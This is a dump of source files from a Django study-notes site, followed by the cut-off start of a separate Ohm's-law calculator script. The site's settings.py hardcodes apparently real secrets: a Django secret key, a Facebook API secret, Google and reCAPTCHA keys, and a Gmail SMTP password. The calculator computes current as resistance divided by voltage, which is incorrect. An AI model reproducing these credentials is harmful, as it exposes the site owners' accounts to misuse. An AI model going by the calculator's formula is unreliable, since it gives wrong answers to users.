"text": "{% extends \"ui/base.html\" %}\r\n\r\n{% block title %}\r\n\r\n<div class=\"grid_11 alpha\">\r\n <span class=\"title\">Become a part of the Notemonk community</span> \r\n</div>\r\n\r\n{% endblock title %}\r\n\r\n{% block content %}\r\n\r\n<!-- spacing -->\r\n<div class=\"grid_11 alpha\">\r\n <br/>\r\n</div>\r\n\r\n<div class=\"grid_11 alpha\">\r\n\r\n<div class=\"form\">\r\n <form action=\"/accounts/register/\" method=\"POST\">\r\n <table>\r\n {{ form.as_table }}\r\n </table>\r\n\r\n <div align=\"center\">\r\n <br/>\r\n <input style=\"height:30px\" type=\"submit\" value=\"Join Notemonk\"/>\r\n </div>\r\n </form>\r\n</div>\r\n\r\n</div>\r\n\r\n{% endblock content %}\r\n\r\n{% block sidebar %}\r\n <div class=\"subtitle\">Why Join?</div>\r\n <ul>\r\n <li> <strong>Rate</strong> your favorite videos\r\n <li> <strong>Store notes</strong> for quick reference\r\n <li> <strong>Experience</strong> the full depth of Notemonk\r\n </ul>\r\n{% endblock sidebar %}\r\n"
},
{
"alpha_fraction": 0.4555785059928894,
"alphanum_fraction": 0.49793389439582825,
"avg_line_length": 25.88888931274414,
"blob_id": "aa5c37c1eb34b7213c627f19c1b4600b463fb796",
"content_id": "cb1e7cebdccaff020fe7550fcb74494a4d4c259b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/www/core/templates/ui/activities.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load filters %}\n{% load tags %}\n\n{% block content %}\n {% for item in stream %}\n <div class=\"grid_11 alpha stream\">\n {% render item 'more,-flag,-addedby,context' %}\n </div>\n {% endfor %}\n\n {% if next_id != None %}\n <div class=\"grid_11 alpha slight-emphasize\">\n <center>\n <big>\n <strong>\n <a href=\"/activities/all/{{ next_id }}/\">More ...</a>\n </strong>\n </big>\n <center>\n </div>\n {% endif %}\n{% endblock content %}\n\n{% block sidebar %}\n <div class=\"grid_5 alpha\" style=\"margin-left:-10px\">\n <!-- End: adBrite -->\n <div id='div-gpt-ad-1319891242082-0' style='width:300px; height:250px;'>\n <script type='text/javascript'>\n googletag.cmd.push(function() { googletag.display('div-gpt-ad-1319891242082-0'); });\n </script>\n </div>\n </div>\n\n{% endblock sidebar %}\n"
},
{
"alpha_fraction": 0.6315217614173889,
"alphanum_fraction": 0.6315217614173889,
"avg_line_length": 27.75,
"blob_id": "fffe4e720e22f559ff3f7347d390b92049808348",
"content_id": "62f39f49f6e08664226545559b487913c3e282ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 920,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 32,
"path": "/www/core/mdx_safeimage.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import markdown\n\nclass SafeImagePattern(markdown.ImagePattern):\n def handleMatch(self, m, doc):\n img_node = markdown.ImagePattern.handleMatch(self, m, doc)\n img_node.setAttribute('class', 'inline-image')\n\n a_node = doc.createElement('a')\n a_node.setAttribute('href', img_node.attribute_values['src'])\n a_node.appendChild(img_node)\n\n return a_node\n\nclass SafeImageExtension(markdown.Extension):\n\n def extendMarkdown(self, md, md_globals):\n ps = md.inlinePatterns\n index = None\n for i, p in enumerate(ps):\n if isinstance(p, markdown.ImagePattern):\n index = i\n break\n\n if index is not None:\n ps[index] = SafeImagePattern(markdown.IMAGE_LINK_RE)\n\ndef makeExtension(configs=None):\n return SafeImageExtension(configs=configs)\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n"
},
{
"alpha_fraction": 0.6599518656730652,
"alphanum_fraction": 0.6599518656730652,
"avg_line_length": 35.5494499206543,
"blob_id": "31aad9740bfdce1d5b5e6108dae12d77160dcfd0",
"content_id": "e21526da0ecef98d1817f2acfc04ca82d2bda9f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3326,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 91,
"path": "/www/core/recaptcha_form.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import new\n\nfrom django import forms\nfrom django.forms import ValidationError\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\n\nfrom recaptcha.client import captcha\nfrom core.forms import RegistrationForm\nfrom registration.views import register as register_view\nfrom registration.backends.default import DefaultBackend as RegDefaultBackend\n\nclass RegBackend(RegDefaultBackend):\n def register(self, request, **kwargs):\n new_user = RegDefaultBackend.register(self, request, **kwargs)\n referrer = kwargs['referrer']\n if referrer:\n try:\n referrer = User.objects.get(username=referrer)\n new_user_p = new_user.get_profile()\n referrer_p = referrer.get_profile()\n\n new_user_p.referrer = referrer\n\n new_user_p.follow(referrer)\n new_user_p.save()\n\n referrer_p.follow(new_user)\n referrer_p.save()\n except ObjectDoesNotExist:\n pass\n\n return new_user\n\nclass RecaptchaMiddleware:\n def process_view(self, request, view_func, view_args, view_kwargs):\n if view_func == register_view:\n klass = new.classobj('SafeForm', (RegistrationForm, RecaptchaForm),\n {'REQUEST': request})\n\n referrer = request.GET.get('referrer', None)\n if referrer:\n klass.base_fields['referrer'].initial = referrer\n\n view_kwargs['form_class'] = klass\n view_kwargs['backend'] = 'core.recaptcha_form.RegBackend'\n\nclass RecaptchaWidget(forms.Widget):\n \"\"\" A Widget which \"renders\" the output of captcha.displayhtml \"\"\"\n def render(self, *args, **kwargs):\n return captcha.displayhtml(settings.RECAPTCHA_PUBLIC_KEY)\n\nclass DummyWidget(forms.Widget):\n \"\"\"\n A dummy Widget class for a placeholder input field which will\n be created by captcha.displayhtml\n\n \"\"\"\n # make sure that labels are not displayed either\n is_hidden=True\n def render(self, *args, **kwargs):\n return ''\n\nclass RecaptchaForm(forms.Form):\n \"\"\" \n A form class which uses reCAPTCHA for user validation.\n \n If the captcha is not guessed correctly, a ValidationError is raised\n for the appropriate field\n \"\"\"\n recaptcha_challenge_field = forms.CharField(widget=DummyWidget)\n recaptcha_response_field = forms.CharField(widget=RecaptchaWidget, label='')\n\n def clean_recaptcha_response_field(self):\n if 'recaptcha_challenge_field' in self.cleaned_data:\n self.validate_captcha()\n return self.cleaned_data['recaptcha_response_field']\n\n def clean_recaptcha_challenge_field(self):\n if 'recaptcha_response_field' in self.cleaned_data:\n self.validate_captcha()\n return self.cleaned_data['recaptcha_challenge_field']\n\n def validate_captcha(self):\n rcf = self.cleaned_data['recaptcha_challenge_field']\n rrf = self.cleaned_data['recaptcha_response_field']\n ip_address = self.REQUEST.META['REMOTE_ADDR']\n check = captcha.submit(rcf, rrf, settings.RECAPTCHA_PRIVATE_KEY, ip_address)\n if not check.is_valid:\n raise ValidationError('You have not entered the correct words')\n"
},
{
"alpha_fraction": 0.5235229730606079,
"alphanum_fraction": 0.5574398040771484,
"avg_line_length": 28.015872955322266,
"blob_id": "31f5f41cfa4f529f9b5eec9b5b82206ec945ca4f",
"content_id": "35dc246008373155463e96d823eadf854a15194e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 1828,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 63,
"path": "/www/core/templates/ui/video.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"ui/base.html\" %}\n\n{% load tags %}\n{% load filters %}\n\n{% block title %}\n<div class=\"grid_11 alpha\">\n <span class=\"title\">{{ avideo.media.title }}</span>\n (\n <span>{% rate avideo %}, </span>\n <span>{% flag avideo %}</span>)\n <div>\n <span>under <a href=\"{{ avideo.target.link }}\">{{ avideo.target.title|truncatewords:5 }}</a></span>\n <span>by {% render avideo.user.get_profile %}</span>,\n added <span>{{avideo.date_added|dt}}</span>\n </div>\n</div>\n{% endblock title %}\n\n{% block content %}\n\n<div class=\"grid_11 alpha\"><br/></div>\n\n<div class=\"grid_11 alpha\">\n <center>\n <object width=\"425\" height=\"344\">\n <param name=\"movie\" value=\"http://www.youtube.com/v/{{avideo.media.source_id}}&hl=en_US&fs=1&\"></param>\n <param name=\"allowFullScreen\" value=\"true\"></param>\n <param name=\"allowscriptaccess\" value=\"always\"></param>\n <embed src=\"http://www.youtube.com/v/{{avideo.media.source_id}}&hl=en_US&fs=1&\"\n type=\"application/x-shockwave-flash\"\n allowscriptaccess=\"always\" allowfullscreen=\"true\"\n width=\"425\" height=\"344\">\n </embed>\n </object>\n </center>\n</div>\n\n{% note avideo %}\n\n<br/><br/>\n{% question avideo avideo.title 5 %}\n\n{% endblock content %}\n\n{% block sidebar %}\n <div class=\"grid_5 omega gad\">\n\n <script type=\"text/javascript\"><!--\n google_ad_client = \"ca-pub-2945383363046281\";\n /* 300 x 250, notemonk box listing page bottom */\n google_ad_slot = \"9649030723\";\n google_ad_width = 300;\n google_ad_height = 250;\n //-->\n </script>\n <script type=\"text/javascript\"\n src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n </script>\n\n </div>\n\n{% endblock %}\n"
},
{
"alpha_fraction": 0.5287958383560181,
"alphanum_fraction": 0.5375218391418457,
"avg_line_length": 23.913043975830078,
"blob_id": "37be41677919e843241a255294845f140787f20f",
"content_id": "d3d907fa148f3e3d904fcd3b1d50a86d4f04a44c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 573,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 23,
"path": "/www/core/templates/renderables/comment_group.html",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "{% extends \"renderables/group_base.html\" %}\n\n{% load tags %}\n{% load filters %}\n\n{% block digest %}\n <div class=\"grid_1 alpha\">\n {% render target.user.get_profile 'image,-text,more' %}\n </div>\n\n <div class=\"grid_9 omega\" style=\"padding:0px 10px;\">\n {% if target|cname == 'ProfilePost' %}\n {% render target 'more,comment' %}\n {% else %}\n {% render target 'more' %}\n {% comment target 'image,commentbox' %}\n {% endif %}\n </div>\n \n{% endblock digest %}\n\n{% block activities %}\n{% endblock activities %}\n"
},
{
"alpha_fraction": 0.6257695555686951,
"alphanum_fraction": 0.6266490817070007,
"avg_line_length": 30.150684356689453,
"blob_id": "c16d7051f5fae5df6caf8d72224612cc73c36318",
"content_id": "b1c1bbf52ec6e6020f376340c818f2d50a24786d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2274,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 73,
"path": "/www/scripts/v2migrate.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\nimport os\nimport datetime\nimport hashlib\nfrom core.utils import QuerySetMerge, QuerySetFilter\nfrom django.core.files.base import ContentFile\nfrom django.contrib.contenttypes.models import ContentType\nfrom core.models import *\n\n\ndef main():\n\n # Ensure Markup rendered field is filled in\n # By force saving all models\n for k in (Question, Answer, Note):\n for o in k.objects.all():\n o.save()\n\n # Prepopulate activities into Activity table\n qsets = []\n for k in (PointsHistory, Book, Note, Question, Answer,\n Ratings, Follows, Flags, Redemption, Attachment,\n Comment, ProfilePost):\n qsets.append(k.objects.all().order_by('-date_added'))\n\n qsets.append(QuerySetFilter(AssociatedMedia.objects.all().order_by('date_added'),\n fn=lambda x: (x if isinstance(x.media, Video) else None)))\n qset = QuerySetMerge(qsets, 'date_added')\n\n for o in qset:\n a = Activity.add(o.user, o)\n if a is None: continue\n a.date_added = o.date_added\n a.save()\n\n # Convert Q&A in user pages into ProfilePosts and Comments\n\n uprofile_ctype = ContentType.objects.get_for_model(UserProfile)\n\n questions = Question.objects.filter(target_type=uprofile_ctype.id).order_by('-date_added')\n for q in questions:\n pp = ProfilePost.objects.create(user=q.user, profile=q.target,\n text=q.text.raw)\n pp.date_added = q.date_added\n pp.save()\n\n answers = q.answer_set.all().order_by('-date_added')\n for a in answers:\n Comment.objects.create(user=a.user, text=a.text.raw,\n target_type=pp.ctype, target_id=pp.id)\n\n\n # Make book download into attachment\n for b in Book.objects.all().order_by('-date_added'):\n if not b.file: continue\n if not os.path.exists(b.file.path): continue\n c = open(b.file.path, 'rb').read()\n checksum = hashlib.md5(c).hexdigest()\n c = ContentFile(c)\n\n u = UploadedFile(checksum=checksum, uploader=b.user)\n u.file.save(b.file.name, c, save=True)\n u.save()\n\n a = b.attach(b.user, ufile=u, title='FULL NCERT BOOK - ZIP')\n\n\n def backwards(self, orm):\n pass\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5045672059059143,
"alphanum_fraction": 0.5102218389511108,
"avg_line_length": 25.413793563842773,
"blob_id": "e3ce2601242315d7a18381140afbb653a3a91d9b",
"content_id": "1e86b0dcd91bf9062046ee16100ec82941e908a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2299,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 87,
"path": "/www/static/js/main.js",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "\nfunction setup_showhide(show_button, hide_button, content)\n{\n $(content).hide();\n\n $(show_button).click(function(){\n $(show_button).fadeOut(\"fast\");\n $(content).slideDown(\"slow\");\n return false;\n });\n $(hide_button).click(function(){\n $(show_button).fadeIn(\"slow\");\n $(content).slideUp(\"fast\");\n return false;\n });\n}\n\nfunction init_default_text()\n{\n $(\".default_text\").focus(function(srcc)\n {\n if ($(this).val() == $(this)[0].title)\n {\n $(this).removeClass(\"default_text_active\");\n $(this).val(\"\");\n }\n });\n \n $(\".default_text\").blur(function()\n {\n if ($(this).val() == \"\")\n {\n $(this).addClass(\"default_text_active\");\n $(this).val($(this)[0].title);\n }\n });\n \n $(\".default_text\").blur();\n}\n\nfunction initialize()\n{\n init_default_text();\n\n $('img.captify').captify({\n // all of these options are... optional\n // ---\n // speed of the mouseover effect\n speedOver: 'fast',\n // speed of the mouseout effect\n speedOut: 'normal',\n // how long to delay the hiding of the caption after mouseout (ms)\n hideDelay: 500, \n // 'fade', 'slide', 'always-on'\n animation: 'slide', \n // text/html to be placed at the beginning of every caption\n prefix: '', \n // opacity of the caption on mouse over\n opacity: '0.7', \n // the name of the CSS class to apply to the caption box\n className: 'caption-bottom', \n // position of the caption (top or bottom)\n position: 'bottom',\n // caption span % of the image\n spanWidth: '100%'\n });\n\n setup_showhide('#add_image', '#hide_images_add', '#images_add_form')\n setup_showhide('#add_video', '#hide_videos_add', '#videos_add_form')\n \n $('.elastic').elastic();\n}\n\nfunction expandtextarea(button, post_form, textbox, user_anonymous,\n ref_path)\n{\n if ('True' == user_anonymous)\n {\n window.location=\"/login/?next=\"+ref_path\n }\n else\n {\n window.setTimeout(function(){\n $(button).hide();\n $(post_form).show();\n $(textbox).focus();}, 100);\n }\n}\n"
},
{
"alpha_fraction": 0.6077630519866943,
"alphanum_fraction": 0.6087844967842102,
"avg_line_length": 26.97142791748047,
"blob_id": "50ae525b5b9348f8d66be04409d5588531d0de91",
"content_id": "3c128b6b5ea246c496a880df15ebd8543a1e309a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 979,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 35,
"path": "/www/scripts/v3migrate.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n'''\nActivity system revamp. Need to populate stream per user and book.\n'''\nfrom django.contrib.contenttypes.models import ContentType\nfrom core.models import *\n\n\ndef main():\n \n # Create Stream per user and book\n for u in UserProfile.objects.all():\n if u.stream is None:\n u.stream = Stream.objects.create(title='for user: %s' % u.user.username)\n u.save()\n\n for b in Book.objects.all():\n if b.stream is None:\n b.stream = Stream.objects.create(title='for book: %s' % b.title)\n b.save()\n\n # create stream entries for profile posts\n ppost_type = ContentType.objects.get_for_model(ProfilePost)\n for a in Activity.objects.filter(target_type=ppost_type).order_by('date_added'):\n p = a.target\n\n if p.profile.user == p.user:\n continue\n\n si = p.profile.stream.add(a)\n si.date_added = a.date_added\n si.save()\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.650877833366394,
"alphanum_fraction": 0.6706727743148804,
"avg_line_length": 31.545454025268555,
"blob_id": "07b06ffd8f632c010ac52ecb94a7c845195c398a",
"content_id": "3442e5cfcaa7a5b87e94161a7a2847fc1921a070",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8487,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 253,
"path": "/www/settings.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import os\r\nimport logging\r\n\r\ndef create_logger(filename, log_level=logging.NOTSET, stderr=False):\r\n '''\r\n Make a logger that writes to I{filename}.\r\n\r\n @type filename: str\r\n @param filename: filename of file to which log has to be written\r\n\r\n @type log_level: logging.<log level>\r\n @param log_level: logging.[DEBUG, INFO, EXCEPTION, WARNING]\r\n\r\n @return: log object\r\n '''\r\n\r\n logger = logging.getLogger()\r\n handler = logging.FileHandler(filename)\r\n formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\r\n\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n if stderr:\r\n handler = logging.StreamHandler(sys.stderr)\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n logger.setLevel(log_level)\r\n\r\n return logger\r\n\r\n\r\nLOG_FNAME = 'notemonk.log'\r\ncreate_logger(LOG_FNAME, logging.DEBUG)\r\n\r\nTEMPLATE_DEBUG = DEBUG = True #False\r\n\r\nPROJNAME = os.path.basename(os.path.dirname(__file__))\r\n\r\nADMINS = (\r\n ('Notemonk', '[email protected]'),\r\n)\r\n\r\nMANAGERS = ADMINS\r\n\r\n#DATABASE_ENGINE = 'sqlite3' # or 'oracle', 'postgresql_psycopg2', 'postgresql', 'mysql',\r\n#DATABASE_NAME = 'sitebase.db' # Or path to database file if using sqlite3.\r\n#DATABASE_USER = '' # Not used with sqlite3.\r\n#DATABASE_PASSWORD = '' # Not used with sqlite3.\r\n#DATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\r\n#DATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\r\n\r\nDATABASE_ENGINE = 'mysql' # or 'oracle', 'postgresql_psycopg2', 'postgresql', 'mysql',\r\nDATABASE_NAME = 'notemonk_db' # Or path to database file if using sqlite3.\r\nDATABASE_USER = 'root' # Not used with sqlite3.\r\nDATABASE_PASSWORD = '' # Not used with sqlite3.\r\nDATABASE_HOST = 'localhost' # Set to empty string for localhost. Not used with sqlite3.\r\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\r\n\r\n# Local time zone for this installation. Choices can be found here:\r\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\r\n# although not all choices may be available on all operating systems.\r\n# If running in a Windows environment this must be set to the same as your\r\n# system time zone.\r\nTIME_ZONE = 'America/Chicago'\r\n\r\n# Language code for this installation. All choices can be found here:\r\n# http://www.i18nguy.com/unicode/language-identifiers.html\r\nLANGUAGE_CODE = 'en-us'\r\nSITE_ID = 1\r\n\r\n# If you set this to False, Django will make some optimizations so as not\r\n# to load the internationalization machinery.\r\nUSE_I18N = True\r\n\r\n# Absolute path to the directory that holds media.\r\n# Example: \"/home/media/media.lawrence.com/\"\r\nMEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'static')\r\n\r\nSTATICFILES_DIRS = [MEDIA_ROOT]\r\nSTATIC_URL = '/static/'\r\n\r\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\r\n# trailing slash if there is a path component (optional in other cases).\r\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\r\nMEDIA_URL = 'http://static.notemonk.com/'\r\n\r\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\r\n# trailing slash.\r\n# Examples: \"http://foo.com/media/\", \"/media/\".\r\nADMIN_MEDIA_PREFIX = '/static/admin/'\r\nADMIN_MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = 'ny2a@_*z4^9nw93nd96hdte*e#&x!**rskn(*k0h99y+u^-y3g'\r\n\r\n# List of callables that know how to import templates from various sources.\r\nTEMPLATE_LOADERS = (\r\n 'django.template.loaders.filesystem.load_template_source',\r\n 'django.template.loaders.app_directories.load_template_source',\r\n# 'django.template.loaders.eggs.load_template_source',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n 'johnny.middleware.LocalStoreClearMiddleware',\r\n 'johnny.middleware.QueryCacheMiddleware',\r\n 'django.middleware.cache.UpdateCacheMiddleware',\r\n 'core.utils.StripCookieMiddleware',\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.middleware.gzip.GZipMiddleware',\r\n 'django.middleware.http.ConditionalGetMiddleware',\r\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\r\n# 'facebook.djangofb.FacebookMiddleware',\r\n 'core.recaptcha_form.RecaptchaMiddleware',\r\n 'django.middleware.cache.FetchFromCacheMiddleware',\r\n)\r\n\r\nAUTHENTICATION_BACKENDS = (\r\n 'django.contrib.auth.backends.ModelBackend',\r\n #'core.auth_backends.FacebookBackend',\r\n 'social_auth.backends.facebook.FacebookBackend',\r\n )\r\n\r\n# Context Processors\r\nTEMPLATE_CONTEXT_PROCESSORS = [\r\n 'django.core.context_processors.auth',\r\n 'django.core.context_processors.media',\r\n 'django.core.context_processors.request',\r\n]\r\n\r\nif DEBUG:\r\n TEMPLATE_CONTEXT_PROCESSORS.append(\r\n 'django.core.context_processors.debug')\r\n\r\nROOT_URLCONF = '%s.urls' % PROJNAME\r\n\r\nTEMPLATE_DIRS = (\r\n os.path.join(os.path.dirname(__file__), 'templates').replace('\\\\', '/'),\r\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\nAPPEND_SLASH = True\r\n\r\nINTERNAL_IPS = ('127.0.0.1')\r\n#INTERNAL_IPS = ('127.0.0.1', '115.252.180.228')\r\n\r\ndef custom_show_toolbar(request):\r\n remote_ip = request.META.get('REMOTE_ADDR', None)\r\n return remote_ip in INTERNAL_IPS\r\n\r\nDEBUG_TOOLBAR_CONFIG = {\r\n 'SHOW_TOOLBAR_CALLBACK': custom_show_toolbar,\r\n 'INTERCEPT_REDIRECTS': False,\r\n}\r\n\r\nCACHE_BACKEND = 'memcached://127.0.0.1:11211/'\r\nJOHNNY_CACHE_BACKEND = CACHE_BACKEND\r\nJOHNNY_MIDDLEWARE_KEY_PREFIX='jc_myproj'\r\n\r\nINSTALLED_APPS = (\r\n 'django.contrib.admin',\r\n 'django.contrib.admindocs',\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.comments',\r\n 'django.contrib.staticfiles',\r\n 'reversion',\r\n 'registration',\r\n 'markitup',\r\n 'mailer',\r\n 'notification',\r\n 'south',\r\n 'chronograph',\r\n 'debug_toolbar',\r\n '%s.core' % PROJNAME,\r\n 'social_auth'\r\n)\r\n\r\n#LOGIN_URL = '/login/'\r\n#LOGIN_REDIRECT_URL = '/login/done/'\r\n\r\nAUTH_PROFILE_MODULE = 'core.UserProfile'\r\n\r\nFACEBOOK_APP_ID = '7703fdc51bb3335309922341cdb1ec0f' #'215908598562308' \r\nFACEBOOK_API_SECRET = 'de54204098ee835ead92494d532c8454' #'15e2ef23646b90f7ea0b8a1a34877c5c'\r\n\r\n\r\nLOGIN_URL = '/login-form/'\r\nLOGIN_REDIRECT_URL = '/' \r\nLOGIN_ERROR_URL = '/login-error/'\r\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\r\nSOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'\r\nSOCIAL_AUTH_INACTIVE_USER_URL = '/' \r\nSOCIAL_AUTH_MODELS = 'social_auth.db.django_models'\r\n\r\nGOOGLE_API_KEY = 'ABQIAAAABXgfV0AIiD-Sh91u8PWF1hTcWMrQi-gXWhUrBy2z8tO26jF3ChS6N36bzQ7AzAxGftdDJ-XQZDQBtg'\r\n#MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': True, 'extensions':['urlize', 'safeimage']})\r\nMARKITUP_FILTER = ('markdown.markdown', {'safe_mode': True, 'extensions':['urlize']})\r\nMARKITUP_SET = 'markitup/sets/markdown'\r\nMARKITUP_SKIN = 'markitup/skins/simple'\r\n\r\nACCOUNT_ACTIVATION_DAYS = 7\r\n\r\nDEFAULT_FROM_EMAIL = '[email protected]'\r\n\r\nRECAPTCHA_PRIVATE_KEY = '6LdvuQsAAAAAAMZEvIaakrNRtEkhfNzHOq7VvPf2'\r\nRECAPTCHA_PUBLIC_KEY = '6LdvuQsAAAAAAChoAZ98QOiJGOLUrvKsJ9JNU8Kr'\r\n\r\nCACHE_DIR = '/var/www/notemonk.com/www/cache/'\r\nOPENID_SREG = {\"requred\": \"nickname, email\", \"optional\":\"postcode, country\", \"policy_url\": \"\"}\r\nOPENID_AX = [{\"type_uri\": \"email\",\r\n \"count\": 1,\r\n \"required\": True,\r\n \"alias\": \"email\"},\r\n {\"type_uri\": \"fullname\",\r\n \"count\":1 ,\r\n \"required\": False,\r\n \"alias\": \"fullname\"}]\r\n\r\nOPENID_REDIRECT_NEXT = '/accounts/openid/done/'\r\n\r\nNOTIFICATION_QUEUE_ALL = False\r\nSUPERUSERS_NOTIFY = True\r\n\r\nSEND_BROKEN_LINK_EMAILS = True\r\nSERVER_EMAIL = '[email protected]'\r\n\r\nEMAIL_BACKEND = 'core.utils.RoundRobinEmailBackend'\r\nRR_EMAIL_USERS = [x + '@notemonk.com' for x in ('monk', 'admin', 'mailer1', 'mailer2', 'mailer3', 'mailer4', 'mailer5')]\r\n\r\nEMAIL_USE_TLS = True\r\nEMAIL_HOST = 'smtp.gmail.com'\r\nEMAIL_HOST_USER = '[email protected]'\r\nEMAIL_HOST_PASSWORD = 'Willy45Nilly!'\r\nEMAIL_PORT = 587\r\n\r\nFILE_UPLOAD_PERMISSIONS = 0644\r\n\r\n#if DEBUG:\r\n# EMAIL_HOST = '127.0.0.1'\r\n# EMAIL_PORT = 1025\r\n\r\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\r\n#CACHE_MIDDLEWARE_ALIAS = 'default'\r\n#CACHE_MIDDLEWARE_SECONDS = 600\r\n#CACHE_MIDDLEWARE_KEY_PREFIX = ''\r\n"
},
{
"alpha_fraction": 0.7551724314689636,
"alphanum_fraction": 0.7689655423164368,
"avg_line_length": 33.117645263671875,
"blob_id": "7d99f51348cc1ec0beb97ca850f7fcc78434582a",
"content_id": "5af04f065e49f00cdae69ae186b846d9d57b6e09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 17,
"path": "/README.md",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# notemonk\n\n1) Create a virtual env using `virtualenv Notemonk`\n\n2) Activate venv enivironment by `cd Notemonk; source bin/activate;`\n\n3) Clone your project from git with `git clone https://github.com/headrun/notemonk.git`\n\n4) copy the requirements to current dir with `cp notemonk/requirements.pip .`\n\n5) Install the requirement with `pip install -r requirements.pip`\n\n6) You need to copy static images from prod setup or create softlink if prod setup is in same machine.\n\n7) Take a db backup from prod setup or backup location.\n\n8) Once it is configured check in django server.\n"
}
] | 38 |
otter-leo/lei-de-ohm
|
https://github.com/otter-leo/lei-de-ohm
|
c3d7f8abf81703428f2d822c90cf3a9ee17bd352
|
b6337cd7e57443b62aac2b2cfa7c847ff43e4f9a
|
43b71fa2e3763c56c50eb59d5317554d861b09b1
|
refs/heads/master
| 2020-04-03T18:14:39.352832 | 2018-10-31T00:44:48 | 2018-10-31T00:44:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6065318584442139,
"alphanum_fraction": 0.6088647246360779,
"avg_line_length": 41.83333206176758,
"blob_id": "ed9d629231bb13296e68156a1f6e66680da3a1a6",
"content_id": "e6ef471719b73adcccbea2c0d25633fe87818b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1294,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 30,
"path": "/lei-de-ohm.py",
"repo_name": "otter-leo/lei-de-ohm",
"src_encoding": "UTF-8",
"text": "\nimport math\nvalid = False\n\n\nwhile valid == False:\n calc = input('O que você deseja calcular? Para resistência use \"R\", para votagem use \"V\" e para corrente use \"A\":').lower()\n if calc =='a' or calc == 'v' or calc == 'r':\n valid = True\n else:\n print('Digite apenas as letras \"V\", \"R\" e \"A\" para calculcar a Voltagem, Resistencia e Corrente, respectivamente.')\n\n\nif calc =='a' or calc == 'v' or calc == 'r':\n if calc == 'a':\n r= float(input('Insira o valor da resistência. Use apenas valores separados por ponto:'))\n v= float(input('Insira o valor da voltagem. Use apenas valores separados por ponto:'))\n valor = round(r/v,3)\n print ('O valor da corrente é:', valor ,'A')\n\n elif calc == 'v':\n r= float(input('Insira o valor da resistência. Use apenas valores separados por ponto:'))\n i= float(input('Insira o valor da corrente:'))\n valor = round(i * r, 3)\n print ('O valor da voltagem é:', valor ,'V')\n\n elif calc == 'r':\n v= float(input('Insira o valor da voltagem. 